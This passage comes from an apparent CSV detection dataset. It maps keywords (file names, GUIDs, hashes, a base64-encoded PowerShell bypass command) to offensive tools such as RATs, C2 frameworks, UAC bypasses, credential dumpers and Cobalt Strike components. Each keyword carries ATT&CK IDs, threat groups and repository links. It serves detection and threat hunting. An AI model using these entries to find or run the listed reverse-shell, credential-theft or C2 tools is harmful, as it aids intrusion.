T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/cs2modrewrite,1,0,N/A,10,10,553,114,2023-01-30T17:47:51Z,2017-06-06T14:53:57Z -*C2Server.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*C2Server.ps1*,offensive_tool_keyword,PSRansom,PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.,T1486 - T1107 - T1566.001,TA0011 - TA0010,N/A,N/A,C2,https://github.com/JoelGMSec/PSRansom,1,1,N/A,10,4,371,95,2022-09-29T09:54:34Z,2022-02-27T11:52:03Z -*c2server_arm_musl*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*c2server_armv7*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*c2server_debug*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - 
TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*c2server_linux*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,1,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*c2server_macos*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,1,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*c2server_release*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*c2server_windows*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,1,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*C2TaskMessage.*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*c2VydmVyMS5jaWEuZ292*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - 
TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*C2WebSocketHandler.*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*c4d57f02dd8276fb3df81442bda345d4c3004dfc2842b2140ac9e71b30fd743b*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*c51beca480d6e6f88174698503c0856c56488a59101d259c068dccb0902b01ec*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*C526B877-6AFF-413C-BC03-1837FB63BC22*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*c708b83f-4167-4b4c-a1db-d2011ecb3200*,offensive_tool_keyword,o365enum,Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.,T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002,TA0040 - TA0010 - 
TA0007,N/A,N/A,Exploitation tools,https://github.com/gremwell/o365enum,1,0,N/A,7,3,212,40,2021-04-23T14:40:52Z,2020-02-18T12:22:50Z -*c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,0,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*C73A4893-A5D1-44C8-900C-7B8850BBD2EC*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,0,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*C7E4B529-6372-449A-9184-74E74E432FE8*,offensive_tool_keyword,KrakenMask,A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). 
To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.,T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/RtlDallas/KrakenMask,1,0,N/A,9,2,144,28,2023-08-08T15:21:28Z,2023-08-05T19:24:36Z -*C8482002-F594-4C28-9C46-960B036540A8*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/OpenBullet2,1,0,N/A,10,10,1329,424,2023-09-25T22:57:36Z,2020-04-23T14:04:16Z -*c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*ca0b7a38be2f3f63a69aca6da7b3a62a59fcefee92de00e9796f68d4a2a23158*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*CA280845-1F10-4E65-9DE7-D9C6513BBD91*,offensive_tool_keyword,SetProcessInjection,alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.,T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012,TA0005 - TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/OtterHacker/SetProcessInjection,1,0,N/A,9,1,53,10,2023-10-02T09:23:42Z,2023-10-02T08:21:47Z -*cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBGAGkAbABlACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBoAGUAbABsADMAZQByAC4AcABzADEA*,offensive_tool_keyword,Shell3er,PowerShell 
Reverse Shell,T1059.001 - T1021.004 - T1090.002,TA0002 - TA0011,N/A,N/A,shell spawning,https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1,1,0,N/A,N/A,1,56,11,2023-05-07T16:02:41Z,2023-05-07T15:35:16Z -*cache_activedirectory.py*,offensive_tool_keyword,ldeep,In-depth ldap enumeration utility,T1589 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/franc-pentest/ldeep,1,1,N/A,N/A,3,219,26,2023-10-02T20:36:02Z,2018-10-22T18:21:44Z -*cachedump.exe*,offensive_tool_keyword,fgdump,A utility for dumping passwords on Windows NT/2000/XP/2003 machines,T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001,TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008,N/A,Volt Typhoon,Credential Access,https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*cachedump64.exe*,offensive_tool_keyword,fgdump,A utility for dumping passwords on Windows NT/2000/XP/2003 machines,T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001,TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008,N/A,Volt Typhoon,Credential Access,https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*CACTUSTORCH*,offensive_tool_keyword,CACTUSTORCH,A JavaScript and VBScript shellcode launcher. 
This will spawn a 32 bit version of the binary specified and inject shellcode into it.,T1059 - T1055 - T1218 - T1027,TA0002 - TA0008 - TA0011,N/A,N/A,Exploitation tools,https://github.com/mdsecactivebreach/CACTUSTORCH,1,0,N/A,N/A,10,980,241,2018-07-03T06:47:36Z,2017-07-04T10:20:34Z -*CACTUSTORCH.cna*,offensive_tool_keyword,cobaltstrike,CACTUSTORCH: Payload Generation for Adversary Simulations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mdsecactivebreach/CACTUSTORCH,1,1,N/A,10,10,980,241,2018-07-03T06:47:36Z,2017-07-04T10:20:34Z -*CACTUSTORCH.cs*,offensive_tool_keyword,cobaltstrike,CACTUSTORCH: Payload Generation for Adversary Simulations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mdsecactivebreach/CACTUSTORCH,1,1,N/A,10,10,980,241,2018-07-03T06:47:36Z,2017-07-04T10:20:34Z -*CACTUSTORCH.hta*,offensive_tool_keyword,cobaltstrike,CACTUSTORCH: Payload Generation for Adversary Simulations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mdsecactivebreach/CACTUSTORCH,1,1,N/A,10,10,980,241,2018-07-03T06:47:36Z,2017-07-04T10:20:34Z -*CACTUSTORCH.js*,offensive_tool_keyword,cobaltstrike,CACTUSTORCH: Payload Generation for Adversary 
Simulations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mdsecactivebreach/CACTUSTORCH,1,1,N/A,10,10,980,241,2018-07-03T06:47:36Z,2017-07-04T10:20:34Z -*CACTUSTORCH.vba*,offensive_tool_keyword,cobaltstrike,CACTUSTORCH: Payload Generation for Adversary Simulations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mdsecactivebreach/CACTUSTORCH,1,1,N/A,10,10,980,241,2018-07-03T06:47:36Z,2017-07-04T10:20:34Z -*CACTUSTORCH.vbe*,offensive_tool_keyword,cobaltstrike,CACTUSTORCH: Payload Generation for Adversary Simulations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mdsecactivebreach/CACTUSTORCH,1,1,N/A,10,10,980,241,2018-07-03T06:47:36Z,2017-07-04T10:20:34Z -*CACTUSTORCH.vbs*,offensive_tool_keyword,cobaltstrike,CACTUSTORCH: Payload Generation for Adversary Simulations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - 
T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mdsecactivebreach/CACTUSTORCH,1,1,N/A,10,10,980,241,2018-07-03T06:47:36Z,2017-07-04T10:20:34Z -*caffix*amass*,offensive_tool_keyword,Amass,The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.,T1590 - T1591 - T1592 - T1593 - T1594 - T1595,TA0009 - TA0011 - TA0007,N/A,N/A,Information Gathering,https://github.com/OWASP/Amass,1,0,N/A,N/A,10,10153,1759,2023-09-19T11:29:11Z,2018-07-10T16:05:08Z -*caffix/amass*,offensive_tool_keyword,Amass,In-depth subdomain enumeration tool that performs scraping. 
recursive brute forcing06/01/2021 crawling of web archives06/01/2021 name altering and reverse DNS sweeping,T1593 - T1594 - T1595 - T1567 - T1569,TA0007 - TA0009 - TA0004 - TA0005 - TA0011,N/A,N/A,Information Gathering,https://github.com/OWASP/Amass,1,0,N/A,N/A,10,10153,1759,2023-09-19T11:29:11Z,2018-07-10T16:05:08Z -*calebstewart/pwncat*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*-CalendarNTLMLeak*,offensive_tool_keyword,POC,CVE-2023-23397 POC Powershell exploit,T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550,TA0003 - TA0002 - TA0004,N/A,N/A,Exploitation tools,https://github.com/api0cradle/CVE-2023-23397-POC-Powershell,1,1,N/A,N/A,4,340,64,2023-03-17T07:47:40Z,2023-03-16T19:43:39Z -*CALLBACK_HASHDUMP*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*CALLBACK_KEYSTROKES*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*CALLBACK_NETVIEW*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 
- T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*CALLBACK_PORTSCAN*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 